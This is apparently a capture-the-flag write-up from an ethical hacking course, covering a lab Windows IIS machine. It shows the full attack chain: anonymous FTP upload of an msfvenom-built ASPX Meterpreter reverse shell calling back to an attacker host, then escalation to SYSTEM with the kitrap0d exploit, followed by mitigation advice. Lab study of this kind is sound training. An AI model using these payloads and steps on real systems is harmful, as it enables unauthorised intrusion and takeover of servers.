Here is the fourth box in the Practical Ethical Hacking course by The Cyber Mentor. Let’s find out what is hiding there.
Scanning
I use nmap to scan through all the ports using -A option to have as much information as possible for initial scan.
nmap -p- -A -T4 10.10.10.5
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03–18–17 01:06AM <DIR> aspnet_client
| 03–17–17 04:37PM 689 iisstart.htm
|_03–17–17 04:37PM 184946 welcome.png
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
Running (JUST GUESSING): Microsoft Windows 8|Phone|2008|7|8.1|Vista|2012 (92%)
- Port 21 — FTP service with anonymous login allowed. We can try to connect to it and look for files.
- Port 80 — http service running on Microsoft IIS 7.5, potentially vulnerable version. We can search for exploits and visit web page.
Nothing interesting here, we already know the IIS version. Let’s try to connect to FTP.
ftp 10.10.10.5
Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
03–18–17 01:06AM <DIR> aspnet_client
03–17–17 04:37PM 689 iisstart.htm
03–17–17 04:37PM 184946 welcome.png
226 Transfer complete.
iisstart.htm looks like starting page on the web site. I’ll try to get welcome.png through the site.
FTP and HTTP services run from the same folder. If I upload some malicious file to the FTP, I could execute it from the browser.
Exploitation
To create payload file I’ll use msfvenom.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.10 LPORT=4444 -f aspx > ex.aspx
- -p to choose payload;
- LHOST is the attacker’s machine ip;
- LPORT sets up listening port;
- -f to choose file type.
Then we need to run handler, a program that will wait for a connection from the target machine on port 4444 to send meterpreter to it when connected. To do this, run the Metasploit and execute the following commands.
> msfconsole
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 10.10.14.10
LHOST => 10.10.14.10
We need to choose the same payload that we used in our payload file generated with msfvenom.
msf5 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.14.10:4444
Now we need to get back to ex.aspx file, upload it using FTP and execute.
ftp 10.10.10.5
Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> put ex.aspx
local: ex.aspx remote: ex.aspx
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
2857 bytes sent in 0.00 secs (8.1333 MB/s)
Now we can execute it through the browser.
Nothing interesting happened here, but we need to check metasploit.
Now we got meterpreter session! That’s nice, but we have a problem.
meterpreter > getuid
Server username: IIS APPPOOL\Web
We are not authority, so we need to escalate privileges. We can try to use built-in meterpreter command.
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: Access is denied. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
That didn’t work. Now I’m going to try Local Exploit Suggester. This is very interesting tool, you can read more about it here.
meterpreter > background
[*] Backgrounding session 1…
msf5 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester
msf5 exploit(multi/handler) > options
msf5 post(multi/recon/local_exploit_suggester) > set session 1
session => 1
msf5 post(multi/recon/local_exploit_suggester) > run
Now it’s going to check system if it vulnerable to every exploit Metasploit has for this OS.
I’ll use ms10_015_kitrap0d exploit for now.
msf5 exploit(multi/recon/local_exploit_suggester) > use exploit/windows/local/ms10_015_kitrap0d
msf5 exploit(windows/local/ms10_015_kitrap0d) > set session 1
session => 1
msf5 exploit(windows/local/ms10_015_kitrap0d) > set LHOST 10.10.14.10
LHOST => 10.10.14.10
msf5 exploit(windows/local/ms10_015_kitrap0d) > run
Exploit do it work, we got meterpreter session back again.
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
It worked!
Mitigation
As I see it:
- OS and IIS versions should be updated to at least last supported versions with the latest updates installed.
- Anonymous login to FTP server should be disallowed.
- The web server root folder should be separated from the FTP root folder.
Output
- Metasploit and meterpreter are not required to get root access. I could use shell/reverse_tcp and set up listener using netcat. I’ll definitely work on this machine again without using metasploit and meterpreter and as usual want to mention writeup on it by Rana Khalil.
